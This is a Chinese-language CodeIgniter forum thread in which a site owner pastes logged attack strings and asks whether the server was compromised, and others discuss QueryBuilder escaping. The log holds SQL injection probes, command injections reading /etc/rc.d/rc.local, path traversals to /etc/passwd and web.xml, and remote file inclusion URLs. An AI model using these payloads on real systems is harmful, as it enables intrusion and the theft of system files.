用户
 找回密码
 入住 CI 中国社区
搜索
查看: 2485|回复: 5
收起左侧

SQL注入攻击

[复制链接]
发表于 2017-6-22 11:16:33 | 显示全部楼层 |阅读模式
被sql注册攻击,写入了mysql表的字段中,以下每行一条记录,这些是否已经查看到了我的服务器信息(linux服务器)
angelina
angelina' AND '8281'='8282
angelina' AND '8281'='8283
angelina' AND 8281=8282#
angelina' AND 8281=8283#
angelina%' AND 8281=8281 AND '%'='
angelina%' AND 8281=8282 AND '%'='
angelina%' AND 8281=8283 AND '%'='
angelina" AND "8281"="8281
angelina" AND "8281"="8282
angelina" AND "8281"="8283
angelina" AND 8281=8281-- -
angelina" AND 8281=8282-- -
angelina" AND 8281=8283-- -
angelina%" AND 8281=8281 AND "%"="
angelina%" AND 8281=8282 AND "%"="
angelina%" AND 8281=8283 AND "%"="
angelina") AND 8288=8288 AND "1" in ("1
angelina") AND 8287=8288 AND "1" in ("1
angelina") AND 8287=8289 AND "1" in ("1
/usr/bin/id;
;/usr/bin/id;
1;cat /etc/rc.d/rc.local;
1";cat /etc/rc.d/rc.local;"
set
x||set||x
${@print(md5(812812))};
string:{var_dump(md5(812812))}
";${@print(md5(812812))};//
"];${@print(md5(812812))};//
../../../../../../../../../../../../../../etc/pass
../../../../../../../../../../../../../../etc/pass
../../../../../../../../../../../../../../etc/pass
/../../../../../../../../../../../../../../etc/pas
/../../../../../../../../../../../../../../etc/pas
/../../../../../../../../../../../../../../etc/pas
//../....//....//....//....//....//....//....//...
//../....//....//....//....//....//....//....//...
//../....//....//....//....//....//....//....//...
//../..//..//..//..//..//..//..//..//..//..//..//.
//../..//..//..//..//..//..//..//..//..//..//..//.
//../..//..//..//..//..//..//..//..//..//..//..//.
\..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc\pas
\..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc\pas
\..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc\pas
\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\
\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\
\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\
../../../../../../../../../../sbin/../etc/./rc.d/.
../../../../../../../../../../sbin/../etc/./rc.d/.
../../../../../../../../../../sbin/../etc/./rc.d/.
/../../../../../../../../../../sbin/../etc/./rc.d/
/../../../../../../../../../../sbin/../etc/./rc.d/
/../../../../../../../../../../sbin/../etc/./rc.d/
c:/windows/win.ini
c:/windows/win.ini.htm
c:/x/xx/../../../../../../boot.ini
c:/x/xx/../../../../../../boot.ini.php
x/xx/../../../../../../../../../../../boot.ini
x/xx/../../../../../../../../../../../boot.ini.php
http://cirt.net/rfiinc.txt
http://cirt.net/rfiinc.txt.htm
http://cirt.net/rfiinc.txt.php
cirt.net/rfiinc.txt
cirt.net/rfiinc.txt.html
cirt.net/rfiinc.txt.php
htTp://cirt.net/rfiinc.txt.jpeg
data://text/plain;base64,W0hlbGxvIEFpc2h5XQ==
data://text/plain;base64,W0hlbGxvIEFpc2h5XQ==.html
file:///etc/passwd
file:///etc/passwd.jpg
../../../../../../../../../../etc/rc.d/rc.local
../../../../../../../../../../etc/rc.d/rc.local.jp
file:///etc/rc.d/rc.local
file:///etc/rc.d/rc.local.jpg
app.conf
app.conf.jpg
../app.conf
../app.conf.htm
../../app.conf
../../app.conf.jpg
/../../WEB-INF/web.xml
/../../WEB-INF/web.xml.jpg
\..\..\WEB-INF\web.xml
\..\..\WEB-INF\web.xml
\..\..\WEB-INF\web.xml.htm
\\..\\..\\WEB-INF\\web.xml.php
\\..\....\\....\\WEB-INF\web.xml
\\..\....\\....\\WEB-INF\web.xml
\\..\....\\....\\WEB-INF\web.xml.php
WEB-INF\web.xml
WEB-INF\web.xml
WEB-INF\web.xml.jpg
../../WEB-INF/web.xml
../../WEB-INF/web.xml.htm
..\..\WEB-INF/web.xml
..\..\WEB-INF/web.xml
..\..\WEB-INF/web.xml.html
WEB-INF/web.xml
WEB-INF/web.xml.jpeg
index.jsp
index.jsp.jpeg

发表于 2017-6-22 14:02:45 | 显示全部楼层
用 QueryBuilder 就可以防止 SQL 注入攻击。
 楼主| 发表于 2017-6-22 15:05:26 | 显示全部楼层
Hex 发表于 2017-6-22 14:02
用 QueryBuilder 就可以防止 SQL 注入攻击。

上面那些注入攻击是否能查到服务器信息
发表于 2017-6-22 18:39:26 | 显示全部楼层
kao10324 发表于 2017-6-22 15:05
上面那些注入攻击是否能查到服务器信息

你提供的这些信息只是给数据库插入了一些垃圾信息,但是黑客有没有攻击服务器,需要你提供更多信息才能判断。PS: 这跟 CI 有什么关系?
 楼主| 发表于 2017-6-26 09:38:06 | 显示全部楼层
Hex 发表于 2017-6-22 18:39
你提供的这些信息只是给数据库插入了一些垃圾信息,但是黑客有没有攻击服务器,需要你提供更多信息才能判 ...

QueryBuilder:
$this->db->where('tablename', $data);
$this->db->insert('tablename', $data);
$this->db->update('tablename', $data);
是不是$data只有在用数组的时候才会转义防sql注入,
如果$data = "name = 'test'";用字符串的情况下是不转义的
发表于 2017-6-26 10:12:23 | 显示全部楼层
kao10324 发表于 2017-6-26 09:38
QueryBuilder:
$this->db->where('tablename', $data);
$this->db->insert('tablename', $data);

使用 QueryBuilder 就会转义,不管是不是数组,但是 insert 这个规定必须用数组。

本版积分规则